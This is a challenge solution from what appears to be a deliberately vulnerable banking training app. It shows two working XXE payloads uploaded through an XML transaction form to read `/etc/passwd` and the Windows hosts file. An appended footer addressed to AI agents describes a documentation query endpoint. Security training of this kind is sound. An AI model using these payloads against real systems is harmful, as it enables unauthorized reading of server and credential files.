# Challenges

## XXE

Depending on which OS the application is running, we can find different paths. For instance, if the application is running on the Windows server, we can for sure expect that there will be an available file in location `C:/Windows/System32/drivers/etc/hosts`. On the other hand, if the app is running on Linux, then we can expect that file `/etc/passwd` exists.

### Solution

If you visit the transaction page, you will be able to see a form where you can upload transactions. This form requires an XML file format. If we upload a simple XXE sample, we will be able to see the output of specified paths.

![](/files/-M4x9-EU2xdbEtdGMArp)

* If you are trying to get `C:/Windows/System32/drivers/etc/hosts`:

```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo 
  [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" >
]>
<foo>&xxe;</foo>
```

* If you are trying to get `etc/passwd`:

```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo 
  [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
```

You will find the flag in the response header.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ssrd.gitbook.io/securebank/xml-external-entities-xxe/xxe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.